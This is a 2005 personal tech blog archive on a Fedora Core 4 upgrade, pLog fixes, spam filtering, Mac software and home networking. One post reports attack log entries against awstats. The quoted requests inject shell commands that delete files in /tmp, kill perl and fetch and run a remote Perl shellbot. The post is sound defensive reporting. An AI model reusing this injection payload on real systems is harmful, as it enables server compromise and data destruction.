Sunday, July 31, 2005

Upgraded to Fedora Core 4


I have finished most of the upgrade to Fedora Core 4 from Red Hat 9.  This was relatively successful, as you are reading this now.


I did encounter some problems with this upgrade, and I am going to attempt to document them.  My notes may not be that clear, as I only got 4 hours of sleep in the past two days, because of this upgrade.


PHP

Fedora Core 4 includes PHP5.  This mainly worked for the scripts that I run, but I did have to do some modification in order to get pLog to work.  It appears that when pLog is run within PHP5, it uses more than the 8Mb of memory allocated to scripts.  While in PHP4, this was not a problem.  I increased it to 16Mb and the problem went away most of the time.  I am still seeing it periodically.


Also PHP5 is more strict on php syntax, so there are a lot of notices in the logs.  I am working through these warnings now, and I hope to check something in soon.


Also, It looks like the version of php that is included with Fedora Core 4, does not include GD.  To get gd, you should run "yum install php-gd".


Cyrus-imapd

This took me the longest to get working.  I had been using cryus previously for my imap server, so I was assuming that the upgrade would be seamless.  It looks like the db4 database format changed sometime between RH9 and FC4.  I used the steps on this page to get the imap folders working correctly.  This was a pain for my account, as I have a lot of nested folders.  In fact, I haven't finished this step yet


Saturday, July 30, 2005

sha1sum for Mac OS X


I have finished downloading all of the disk images for Fedora Core 4 on my mac.  I wanted to verify that the files were not corrupted.  Fedora provides the sha1 checksum for each of the images for this purpose.  Mac OS X doesn't provide md5sum or sha1sum tools at all.  Fink does provide a way to install md5sum, but not sha1sum.


This web site provides a small package that includes md5sum, sha1sum, and ripemd160sum,  I was able to compile it just fine.  The only problem that I had was during the "make install" step the Makefile attempted to set the owner to a nonexistent one in Mac OS X.  Even with that problem the programs work fine.


Technorati Tags: ,

Friday, July 29, 2005

Bits on Wheels


Bits On WheelsI have decided to upgrade my server to Fedora Core 4, from Red Hat 9.  So I started to download the images with http.  The download was taking too long, so I decided to switch to use BitTorrent.  I wanted to download this on my mac since I have been having problems with stability on my linux box.


I am trying Bits on Wheels, and it seems to be a pretty cool Mac OS X BitTorrent client.  It seems more stable and the interface seems faster than Azureus.  It has a need feature, where it will show a 3D representation of the current transfer swarm.


Technorati Tags: , ,

Thursday, July 28, 2005

Fixed dates in rss 2.0 feed


It has been bothering me that my rss aggregator is displaying the time that it loads my posts, and not the time that I wrote them.  So I decided to fix this.


The problem was that the rss 2.0 spec states that the date should be in GMT, while pLog was printing it out in the local time zone. This diff, fixes this problem in the 1.0.2 version of pLog.  This also has been added to this bug.


Update: I have checked this in to the 1.0.2 tree.


Technorati Tags: , ,

Wednesday, July 27, 2005

Work on Sentra


Yesterday and today I had some work done on our 1993 Nissan Sentra. The suspension on the car has been pretty bad. Yesterday, we had the front and rear shocks and struts replaced on the car with ones from KYB. This has improved the ride of the car significantly. In fact it has brought the ride closer to that of the 2000 VW Jetta that we used to own.



Old electronics


6411A couple of weeks ago, I change cubicles at work.  Since I had to pack everything to move, I took the opportunity to throw away stuff that I didn't need anymore.  One of the things that I threw out was the box for the Pine D'Music SM-200C.  This got me thinking of how fast technology changes.



Tuesday, July 26, 2005

Using NewsFire now


Ever since I have installed the GarageBand 2.0.2 update, Shrook has become extremely unstable.  When I launch it, and leave it in the background, I get a Bad access exception in CFNetwork while doing a http read.  I don't know what was included in the GarageBand that would cause this problem.


But since Shrook is not working, I downloaded and registered NewsFire.  I haven't used it since the author made it shareware, because I had paid for Shrook.  But, after registering it is a great RSS client.


Technorati Tags: , ,

Saturday, July 23, 2005

mtop


I just read an article in the July 2005 issue of Linux Magazine on mtop. This is an interesting tool that connects to a mysql database and allows you to see the queries as they happen.  This can be pretty useful, especially if you are trying to track down sql statements that take a long time.


Technorati Tags: , ,

Internal DNS


I just noticed something interesting.  Since we use DHCP in out network, I was curious what ip address were allocated to the devices on my network.  So I ran the following command:



nmap -sP 192.168.1.0/24


I noticed something interesting.  A lot of the machines have fully qualified domain names.  I was curious why this was happening, especially since I didn't create these entries.


Friday, July 22, 2005

I want a camera phone


There have been more and more times that I want to get a camera phone.  This week, I was in a cab traveling from the London, Ontario airport.  Then on the side of the road was a building where locomotives were coming out of large doors.  It turns out that this was the ElectroMotive Canada plant.  That would have been a cool picture to take.


I have been holding off on getting a camera phone because I haven't seen one that has all of the features that I want.  I want one that has BlueTooth and can sync with my Mac via iSync.  Since I want to stay with Verizon, and they don't off any phones with these capabilities, I am not changing phones. 


Also, Verizon seems to like to disable the BlueTooth implementation in their phones. They seem to restrict it to only being able to use it for hands free kits.


Technorati Tags: ,

Replacement iPod headphones


Previously, I mentioned about how the headphones that came with the iPod Shuffle were uncomfortable while I was using them on a long flight.  I mentioned this to my wife, and she got me replacement headphones for Father's Day.  This week I had a long flight, so it was the first time that I really got to try them out.


The Sony MDR-EX51LP are ear bud head phones that are very comfortable.  I had a 5 hour flight this week, and I had the head phones in the whole time, without any pain.  They do sound a little different than the Apple headphones, but they didn't sound bad.


Technorati Tags:

Tuesday, July 19, 2005

Hotel broadband


When I checked into the Hilton in London, Ontario, I asked if broadband internet was available in the room.  They said that both wireless and wired internet was available.  I connected with the wireless, and it works fine, but it seems a little slow.  I wanted to see if I could get a faster connection with the wired connection.


There is a box on the desk that is labeled nStreams Technology Data over Voice Access Hub.  It looks like there is something in the hotel's phone head end that multiplexes the data signal on top of the voice line.  This sound very similar to DSL.


The speed of the wired connection was not that much better.  I assume that the connection to the external network is just not that fast.

tractors at the airport


Jazz TractorWhen we landed in Toronto today and saw something interesting at the Toronto airport.  Air Canada Jazz uses tractors to move the planes around the airport.  This is the first time that I have seen these be used, but I think that it is a great idea.


Technorati Tags: ,

Lance in France podcast


I haven't been watching the television coverage of the Tour de France, but I have wanted to keep up with Lance Armstrong's progress.


SIRIUS Satellite Radio has made their coverage of Lance Armstrong in the Tour de France available as a podcast.


Technorati Tags: ,

Sunday, July 17, 2005

Updated Honda Navigation DVD

I bought the updated DVD for our 2004 Honda Odyssey, and the 2.20 version arrived on Friday.  I was hoping that, in addition to the updated maps, it would include some software fixes like improving searching speed.

The upgrade went very well, with no problems.  We didn't drive to any areas where the roads have change recently, like around the San Jose airport, so I don't know if the maps are significantly improved.  But we did notice a speed improvement when searching for places.  The other thing that they added is that when getting directions, the navigation shows the exit numbers when directed to exit a freeway.

Update 10/31/09: I have disabled comments on this post, as the majority of them were about getting illegal copies of the navigation DVD.


Technorati Tags: ,



Friday, July 15, 2005

Saving memory


Since I have been having problem with what appears to be a memory leak, I have been taking a look at what has been taking all of the memory. I create a cron job that every five minutes gets the status of the computer. It is running the following command.


ps -auxw; cat /proc/meminfo


I don't have a monitor connected to this computer, but I do run a vnc server.  This had been configured to start KDE.  I changed the window manager for this vnc server to fvwm.  This is a window manager that is smaller than KDE.



Another "productivity" tool


Planarity is a pretty fun puzzle game.


[via I Hate My Cubicle!!!]

Wednesday, July 13, 2005

iBoot


Dataprobe Iboot Remote RebootToday my server became unresponsive.  It looks like apache was eating all of the memory on my computer, as I saw before.  Luckily, my wife was home so she was able to reboot the computer.


I wanted to find an easier way to reboot the computer remotely.  I found the Dataprobe iBoot is a device that can cut power to any device that is connected to the electrical outlet.  It also looks like you can configure it so that a it will cut power and restore it if this devices doesn't receive any network pings.


It looks like this will be available at the end of August for around $250.


Technorati Tags: , ,

Tuesday, July 12, 2005

Gravatar


I have just configured this blog to display gravatars next to each comment.  A gravatar is a globally recognized avatar.  You can sign up for free on gravatar.com, and upload a picture that you want associated with your email.


Then when a web site wants to display an image associated with your email address, it encrypts the email address with md5, and then sends a http request to their web site.  Since it is using md5, it will not be possible to determine the email address from the url.


Technorati Tags: ,

Fixed filtering bug in pLog


I had been noticing that spam comment messages had been getting through my spam filter in pLog.  When I looked at the bayesian token database, it appeared that the tokens were being considered non-spam tokens.  I wasn't able to find the messages that had those tokens in them.


After a little investigation, I found the problem.  It appeared that if the message pass through the bayesian filter, and it thought that it wasn't spam, and then if it was blocked by another filter, the message was deleted.  This would prevent me from being able to correct the bayesian spam filter.


I made a fix for this and have put it in the bug report.  Now when a comment is rejected for any reason, if the bayesian filter through that it was not spam, it will untrain it and then retrain it as spam.  Once it is approved, I will check it in.


With this fix, all spam messages have been blocked.  (And the bayesian database is being trained correctly.)



Fixed php upgrade problems


Since I had the problems upgrading php, I really didn't spend too much more time trying to figure out what was the problem.  Just recently, a the 4.3.11 version of php was released, so I decided to try the upgrade again. 


I hit the same problem again.  I did another search and I found the solution to my problem.  I disabled the zend optimizer, and everything works correctly.


Technorati Tags: ,

Friday, July 8, 2005

potential security hole in awstats [updated]


I noticed the following entries in my log file:


66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")


DNS Anti Spam plugin


I have just enabled the DNS Anti Spam plugin to catch comment spam that isn't stopped with the bayesian filter.  This plugin does some dns checks to determine if:


  1. The ip address is from a known spammer on sorbs.net, spamhaus.org, or dsbl.org.

  2. The title, body text, or the username has a url that is known to be sent out as spam at surbl.org

  3. The url is known to be sent out as spam at surbl.org


Technorati Tags: , ,

blog comment spam schedule?


I was curious about what type of comments were being caught in the bayesian spam filter that pLog has, so I change my setting to keep the spam messages (still marked as spam) instead of deleting them.  On thing that I noticed is that it appears that on the 27th minute after the hour, I batch of spam comments get posted.  (All of them are caught by the filter.)


If I have the 27th minute, I wonder who has the top of the hour.


Technorati Tags: , ,

Google as a referrer?


I have noticed someone doing something strange.  They have configured their browser to report the referrer as Google.


XXX.XX.XX.XX - - [08/Jul/2005:16:26:28 -0700] "GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" 200 28062 "http://www.google.com/" "Mozilla (X11; I; Linux 2.0.32 i586)"


I can't image that there are web servers that allow different content when the referrer is the home page of Google.  Especially since most valid referrers from Google will contain a the search query.  (I really doubt that I am listed on Google's main page.)

Thursday, July 7, 2005

pLog and xml vunerability


A vulnerability has been found in several implementations of xmlrpc libraries for php.  pLog is not affected by this problem as it uses the  Incutio XMLRPC library.


It looks like WordPress is affected by this problem. The 1.5.1.3 version of WordPress has fixed this problem.


Technorati Tags: , ,

Creating XHTML in SubEthaEdit


I had just started playing with TextWrangler, and then I saw this post that describes a very cool feature of SubEthaEdit.  Since SubEthaEdit will colorize text,  now you can make this available in xhtml.


In the Edit menu, there is a menu item named "Copy As XHTML".  This will put the XHTML in your clipboard.  The result will look something like:



<?php

    include_once( PLOG_CLASS_PATH."class/plugin/pluginbase.class.php" );
    include_once( PLOG_CLASS_PATH."class/net/http/httpclient.class.php" );
    include_once( PLOG_CLASS_PATH."class/net/requestgenerator.class.php" );
    
    /**
     * implements notification of
     */

    class PluginSiteMap extends PluginBase
    {
        var $pluginEnabled;
        var $cacheFolder;



[via Paint The Tiger]


Technorati Tags: , , ,

Wednesday, July 6, 2005

Slingbox questions


It looks like Sling Media is shipping their Slingbox device.  This looks like a very cool way to be able to watch all of you video content outside of your house.  In fact, I think that this could replaces some of the uses of BitTorrent for video content.  (I think that BitTorrent is used when people already have access to the content at home, but they want to watch it somewhere else.)


I wonder a couple of things about the Slingbox


  • How does the setup software get the list of possible remote codes?  It doesn't look like there is a way to learn remote codes from the Slingbox itself.  Maybe they have a database that is similar to the one used by Harmony Remotes.

  • Would it be possible to learn IR codes from multiple devices?  For example, plug a AV switcher into the Slingbox, and use remote codes for the AV switcher to change video source, and then send commands for that device.


Technorati Tags: , ,

Technorati Tags


I have just started playing with Technorati Tags, since ecto has built in support for them.  I can see two uses for tags that are not currently handled by the categories:


  1. Allow you to catagorize your posts more specifylcy

  2. Creates a link to other posts on the same topic


Ecto's implementation adds a link to the bottom of the post with links to the Technotati Tags page.


TextWrangler


TextwranglerI saw this post on TUAW about TextWrangler.  It is a free text editor from Bare Bones Software that has some very cool features.


  • grep search and replace

  • syntax coloring

  • integration with native perl

  • built-in ftp/sftp client

  • AppleScript support

  • command line tools


Technorati Tags: , ,

Acronym script


This post has a pretty cool python script that will automatically add <acronym> tags to acronyms or abbreviations in the body of ecto posts.


For example: JPEG


[via ecto blog]


Technorati Tags: ,

Tuesday, July 5, 2005

mail to a CNAME domain


A while ago, I learned that the smtp protocol specifies that you can not have a mx record that points at a CNAME record.  And I also learned that you can not have a MX record on a domain that is a CNAME record.


But it also appears that you can't send message to an email address in a domain that is a CNAME record.  When I set up mailman, I created a CNAME host record for something like list.domain.com.  When I sent email to the list address, it appears that the sending smtp server converts the email address to the domain that the CNAME record point to.  So for example:


list    CNAME  domain.com.


emails to address@list.domain.com got changed to address@domain.com.


When I changed the list.domain.com from a CNAME record to a A record and added a mx record for list.domain.com, the email worked correctly.

Saturday, July 2, 2005

I am a statistic

Take the MIT Weblog Survey

Nvu


I saw this post on MacSlash about Nvu.  Nvu is a WYSIWYG web development tool based on the Mozilla Composer.  This seems like a pretty cool application to edit html files.


Another cool feature of Nvu is that it can automatically update your web site by using ftp or http.  Unfortunately, I have not enabled those mechanism to upload my html files.  I would love to see Nvu have support for scp to upload files.


Technorati Tags:

Outbound smtp service


In these post (post 1, post 2) I described how outgoing mail was hijacked while using a public wireless access points.  I solved this problem by sending mail through a ssh tunnel.  It looks like DynDNS is providing a service that accomplishes the same goal.


Their MailHop Outbound service provides an outgoing mail relay service.  They provide this service on standard and non-standard ports to prevent mail from being blocked.  Also they offer SSL connections to make sure your mail is secure.  It looks like they are charging $14.95/year for the ability to send up to 150 messages a day.

mailman


I have set up a web site for our Home Owners association, and when I did that I set up a mailing list for people on the board.  When I originally set it up, I just used a virtual map to map the one email address to the group of email addresses.


One thing that I didn't like about that solution was that it didn't automatically have a way to archive the posts.  Also, I didn't like the fact that it was such a manual process to add someone to the list.


Since I have used mailman for many of the mailing list that I subscribe to, I decided to install mailman.  The installation was very straight forward, and instructions were very clear.


Friday, July 1, 2005

WiFi at Willy's


Last night I went to Armadillo Willy's to pick up dinner.  When I was there, I noticed that they have a WiFi logos on the doors. 


And I didn't think that BBQ and laptops go together very well.

Changing link format


I changed the format of the urls for this blog to use custom urls.  I had not made this change before because all of the custom urls put the blog name in the url, which is redundant as it is the same as the domain name.


I found this page that describes how to setup custom urls when there is only one blog in pLog.  All of the old urls will still work.

Unlocking Seamless Integration: Navigating Unexpected Hubitat Device Queries and VLAN Challenges for a Smoother Home Automation Experience

During my network debugging efforts , I came across an intriguing observation related to the two Hubitat devices on our network. The logs b...